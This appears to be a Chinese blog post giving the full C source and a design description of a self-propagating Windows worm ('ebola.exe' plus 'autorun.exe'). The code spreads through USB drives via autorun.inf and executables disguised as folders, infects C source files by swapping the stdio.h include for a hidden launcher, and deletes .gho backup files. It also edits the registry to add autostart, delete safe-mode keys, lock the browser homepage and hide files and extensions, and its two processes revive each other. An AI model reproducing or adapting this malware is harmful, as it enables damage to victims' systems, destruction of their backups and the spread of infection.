用几个API实现了一些猥琐功能。。。
ebola.exe 遍历硬盘和U盘文件:如果后缀名为exe,则删除文件。如果为c,则在其目录下生成包含启动ebloa.exe代码的stdio.c头文件,并设其属性为隐藏,修改文件头<stdio.h>为"stdio.c",并在c文件中插入恶意函数。cpp和html的还没找到恶意代码,暂不做处理。如果后缀名为gho,则删除文件。 修改注册表:屏蔽安全模式,添加自启动,修改锁定主页,禁止查看隐藏文件,屏蔽exe文件后缀名,添加开机自启动时可能会有杀软的拦截导致失败,应该再判断下,如果添加失败则修改ebloa文件名,文件名后添加随机数,重新添加自启动.. 每隔0.3秒,扫描硬盘U盘和system32目录,查看autorun.exe是否存在,如不存在,则从其他位置复制. 每隔0.3秒,查找可移动驱动器盘符,判断是否被感染过,如果没被感染过则遍历U盘根目录文件夹,将伪装成文件夹图标的autorun.exe更为与文件夹同名并复制到U盘根目录下,并将原文件夹设为隐藏,并向其根目录下生成autorun.inf文件。 每隔0.1秒,查看windows/system32/autorun.exe是否运行,否则将其运行并隐藏其窗口。 autorun.exe 当启动移动磁盘中伪装成文件夹图标的"autorun.exe"后,"autorun.exe"会将同目录下的ebola.exe和自己复制到每隔磁盘根目录和system32下,运行ebola.exe并隐藏其窗口。 每隔0.3秒,查看每个驱动器根目录和system32下是否存在ebola.exe,不存在则从别处复制。 每隔0.3秒,查看system32下的ebola.exe是否运行,否则将其运行并隐藏窗口。 程序的两个exe文件都设置为隐藏,并且相互监视,如果发现另一方进程被结束则马上重新运行对方。如果能保持注册表中查看隐藏文件键值不被改回来的话,那么不运行命令或借助其他软件应该是不会被显示。。 写这个东西用了很多API,这些API的功能非常强大,这只不过是它们的一个小应用。。如果能加点钩子就更猥琐了。。 主程序ebola.exe long INFC=0,INFCPP=0,INFHTM=0; void infectC(char *path); void ufilereplace(char *path); void searchdisk(char *way,int deep,int type) //遍历感染后缀名为gho,c,cpp,htm,html的文件 { WIN32_FIND_DATA f; HANDLE done; char newway[255],bian[255]; DWORD errorcode = 0; strcpy(newway,way); strcat(newway,"*.*"); done=FindFirstFile(newway,&f); while(errorcode!=ERROR_NO_MORE_FILES) { if(deep==7) break; errorcode=GetLastError(); if(errorcode==ERROR_NO_MORE_FILES) break; if(!(f.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) { strcpy(bian,way); strcat(bian,f.cFileName); if(strrchr(bian,'.')!=NULL) { // if(stricmp(strrchr(bian,'.'),".gho")==0) // gho(bian); // if(stricmp(strrchr(bian,'.'),".c")==0 && stricmp(strrchr(bian,'//'),"//stdio.c")) // infectC(bian); /* if(stricmp(strrchr(bian,'.'),".cpp")==0) infectcpp(bian); if(stricmp(strrchr(bian,'.'),".htm")==0 || stricmp(strrchr(bian,'.'),".html")==0 ) infecthtml(bian); */ } } if( stricmp(f.cFileName, "System Volume Information") && stricmp(f.cFileName, "recycled")&& stricmp(f.cFileName, "Documents and Settings") && stricmp(f.cFileName, "WINDOWS") && (f.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && strcmp(f.cFileName, ".") && strcmp(f.cFileName, "..") ) { strcpy(bian,way); strcat(bian,f.cFileName); if(type==1) ufilereplace(bian); strcat(bian,"//"); searchdisk(bian,deep+1,0); } errorcode=GetLastError(); FindNextFile(done,&f); } CloseHandle(done); } void autorun() //开机自启动 { char subkey[70]="SOFTWARE//Microsoft//Windows//CurrentVersion//Run"; char value[50]="c://windows//system32//ebola.exe"; char vname[10]="ebola"; HKEY hKey; ULONG dType=REG_SZ,len=0; RegOpenKeyEx(HKEY_LOCAL_MACHINE,subkey,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey); if(RegQueryValueEx(hKey,vname,0,&dType, NULL,&len)); RegSetValueEx(hKey,vname,0,REG_SZ,(CONST BYTE*)value,strlen(value)+1); RegCloseKey(hKey); } void safeboot() //屏蔽安全模式 { HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM//CurrentControlSet//Control",0,KEY_WRITE,&hKey); SHDeleteKey(hKey,"SafeBoot"); RegCloseKey(hKey); } void checkautorun() //检查autorun.exe是否运行 { FILE *p; if(NULL!=(p=fopen("C://WINDOWS//system32//autorun.exe","rb+"))) { fclose(p); ShellExecute(NULL,"open","c://windows//system32//autorun.exe",NULL,NULL,SW_HIDE); } } void IEmain(char http[]) //修改主页 { char subkey[70]= "Software//Microsoft//Internet Explorer//Main"; char vname[20]="Start Page"; DWORD value=1; HKEY hKey; ULONG dType=REG_SZ,len=0; RegOpenKeyEx(HKEY_CURRENT_USER,subkey,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey); if(RegQueryValueEx(hKey,vname,0,&dType, NULL,&len)); RegSetValueEx(hKey,vname,0,REG_SZ,(CONST BYTE*)http,strlen(http)+1); RegCloseKey(hKey); strcpy(subkey,"Software//Policies//Microsoft//Internet Explorer//Control Panel"); strcpy(vname,"HomePage"); dType=REG_DWORD; RegCreateKey(HKEY_CURRENT_USER, "Software//Policies//Microsoft//Internet Explorer//Control Panel",&hKey); //锁定主页 RegOpenKeyEx(HKEY_CURRENT_USER,subkey,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey); if(RegQueryValueEx(hKey,vname,0,&dType, NULL,&len)); RegSetValueEx(hKey,vname,0,REG_DWORD,(CONST BYTE*)&value,sizeof(DWORD)); RegCloseKey(hKey); } void finddisk() { char path[5]="c://"; for(;path[0]<='z';path[0]++) { if(DRIVE_FIXED==GetDriveType(path)) searchdisk(path,1,0); if(DRIVE_REMOVABLE==GetDriveType(path)) searchdisk(path,1,1); } /* searchdisk("g://",1,1); searchdisk("h://",1,1);*/ } void Uautorun() //U盘自启动 { FILE *p; char path[20]="c://autorun.inf"; int i=0; char file[200]="[autorun] OPEN=autorun.exe shell/open=打开(&O) shell/open/Command=autorun.exe shell/open/Default=1 shell/explore=资源管理器(&X) shell/explore/Command=autorun.exe"; p=fopen(path,"w"); while(file[i]!='/0') { if(file[i]==' ') fputc('/n',p); else fputc(file[i],p); i++; } fclose(p); } void gho(char *path) //删除gho文件 { remove(path); Sleep(200); } void disktype() //向U盘复制autorun.exe文件 { char disk[15]="c://",copy[15]="c://",*p; for(;disk[0]<='z';disk[0]++) if(DRIVE_REMOVABLE==GetDriveType(disk)) { strcat(disk,"autorun.exe"); while(DRIVE_FIXED==GetDriveType(copy)) { strcat(copy,"autorun.exe"); CopyFile(copy,disk,TRUE); p=strrchr(copy,'//'); *(++p)='/0'; copy[0]++; } p=strrchr(disk,'//'); *(++p)='/0'; strcat(disk,"ebola.exe"); CopyFile("C://WINDOWS//system32//ebola.exe",disk,TRUE); p=strrchr(disk,'//'); *(++p)='/0'; copy[0]='c'; } //修改注册表 隐藏exe后缀名 char subkey[20]= "exefile",code[1]=""; char vname[20]="NeverShowExt"; HKEY hKey; ULONG dType=REG_SZ,len=0; RegOpenKeyEx(HKEY_CLASSES_ROOT,subkey,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey); if(RegQueryValueEx(hKey,vname,0,&dType, NULL,&len)); RegSetValueEx(hKey,vname,0,REG_SZ,(CONST BYTE*)code,1); RegCloseKey(hKey); } void ufilereplace(char *path) //将U盘的文件夹隐藏,将autorun.exe伪装成文件夹的形式传入U盘 { char *p,disk[100]; FILE *p1; // printf("%s/n",path); strcpy(disk,path); strcat(disk,".exe"); if(NULL==(p1=fopen(disk,"r+"))) { CopyFile("c://autorun.exe",disk,TRUE); SetFileAttributes(path,2); SetFileAttributes(disk,8); } else fclose(p1); } void checkebola() //检查驱动器下是否存在autorun.exe 如果没有则从其他驱动器复制 { char path[15]="c://",copy[15]="c://"; char *p; FILE *p1; for(;path[0]<='z';path[0]++) if(DRIVE_FIXED==GetDriveType(path) || DRIVE_REMOVABLE==GetDriveType(path)) { strcat(path,"autorun.exe"); if(NULL==fopen(path,"rb+")) { strcat(copy,"autorun.exe"); while(copy[0]<='z' && NULL==(p1=fopen(copy,"rb+"))) copy[0]++; if(copy[0]<='z') { fclose(p1); CopyFile(copy,path,TRUE); } } if(NULL==(p1=fopen("C://WINDOWS//system32//autorun.exe","rb+"))) CopyFile(copy,"c://windows//system32//autorun.exe",TRUE); else fclose(p1); p=strrchr(copy,'//'); *(++p)='/0'; p=strrchr(path,'//'); *(++p)='/0'; copy[0]='c'; } } void infectC(char *path) //感染后缀名为C的文件 { char subkey[100]="SOFTWARE//Microsoft//Windows//CurrentVersion//Explorer//Advanced//Folder//Hidden//SHOWALL"; char vname[20]="CheckedValue"; DWORD value=0; HKEY hKey; ULONG dType=REG_DWORD,len=0; char code[200],*p; FILE *p1,*p2; int i=0; char ch,head[20]; printf("%s/n",path); p1=fopen(path,"r+"); //修改C头文件,<stdio.h>改为"stdio.c" while(!feof(p1)) { ch=fgetc(p1); if(ch=='(') break; if((ch>='a' && ch<='z') || (ch>='A' && ch<='Z')) { head[i]=ch; i++; } if(i==13) { head[i]='/0'; if(0==stricmp(head,"includestdioh")) { fseek(p1,-1,SEEK_CUR); fputc('c',p1); fseek(p1,-8,SEEK_CUR); fputc('"',p1); fseek(p1,7,SEEK_CUR); fputc('"',p1); break; } else { i=0; while(!feof(p1)) { ch=fgetc(p1); if(ch=='>' || ch=='(' || ch=='/n') break; } fseek(p1,-1,SEEK_CUR); } } } fclose(p1); p1=p2=fopen(path,"r+"); while(!feof(p1)) if(fgetc(p1)=='}') p2=p1; fseek(p2,-1,SEEK_CUR); fputs("f();",p2); fputc('/n',p2); fputc('}',p2); fclose(p2); //c文件已经被感染 //在被感染的C文件同目录下生成stdio.c文件,并设置为隐藏文件 strcpy(code," include stdio.h include windows.h void f ShellExecute NULL, open , C:////WINDOWS////system32////ebola.exe ,NULL,NULL,SW_HIDE ; "); code[0]='#'; code[8]='<'; code[16]='>'; code[17]='/n'; code[18]='#'; code[26]='<'; code[36]='>'; code[37]='/n'; code[44]='('; code[45]=')'; code[46]='/n'; code[47]='{'; code[60]='('; code[66]='"'; code[71]='"'; code[73]='"'; code[106]='"';code[125]=')'; code[128]='}'; p=strrchr(path,'//'); *(++p)='/0'; strcat(path,"stdio.c"); remove(path); p1=fopen(path,"w"); fputs(code,p1); fclose(p1); SetFileAttributes(path,2); //修改注册表,禁止查看隐藏文件 RegOpenKeyEx(HKEY_LOCAL_MACHINE,subkey,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey); if(RegQueryValueEx(hKey,vname,0,&dType, NULL,&len)); RegSetValueEx(hKey,vname,0,REG_DWORD,(CONST BYTE*)&value,sizeof(DWORD)); RegCloseKey(hKey); INFC++; Sleep(200); } void infectcpp(char *path) //感染cpp文件 { INFCPP++; Sleep(200); } void infecthtm(char *path) //感染htm l文件 { FILE *p1,*p2; char code[100]; p1=fopen(path,"w"); } int main() { // checkebola(); // checkautorun(); // finddisk(); // autorun(); // IEmain("http://www.fuck.com"); // Uautorun(); // safeboot(); while(1) { // ShellExecute(NULL,"open","F://4_1//Debug//test.exe",NULL,NULL,SW_HIDE); // disktype(); checkebola(); checkautorun();//检查autorun.exe文件是否被删除,如果删除则自动复制 Sleep(100); } return 0; } 从程序autorun.exe char path[15]="c://",copy[15]="c://"; FILE *p1; char *p; while(1) { //检测ebloa.exe文件是否存在,如果不存在从其他驱动器复制 for(;path[0]<='z';path[0]++) if(DRIVE_FIXED==GetDriveType(path) || DRIVE_REMOVABLE==GetDriveType(path)) { strcat(path,"ebola.exe"); if(NULL==(p1=fopen(path,"rb+"))) { strcat(copy,"ebola.exe"); while(copy[0]<='z' && NULL==(p1=fopen(copy,"rb+"))) copy[0]++; if(copy[0]<='z') { fclose(p1); CopyFile(copy,path,TRUE); } } else fclose(p1); if(NULL==(p1=fopen("C://WINDOWS//system32//ebola.exe","rb+"))) { CopyFile(copy,"c://windows//system32//ebola.exe",TRUE); } else fclose(p1); p=strrchr(copy,'//'); *(++p)='/0'; p=strrchr(path,'//'); *(++p)='/0'; copy[0]='c'; } //检测ebola.exe是否运行 if(NULL!=(p1=fopen("c://windows//system32//ebola.exe","rb+"))) { fclose(p1); ShellExecute(NULL,"open","C://WINDOWS//system32//ebola.exe",NULL,NULL,SW_HIDE); } Sleep(100); }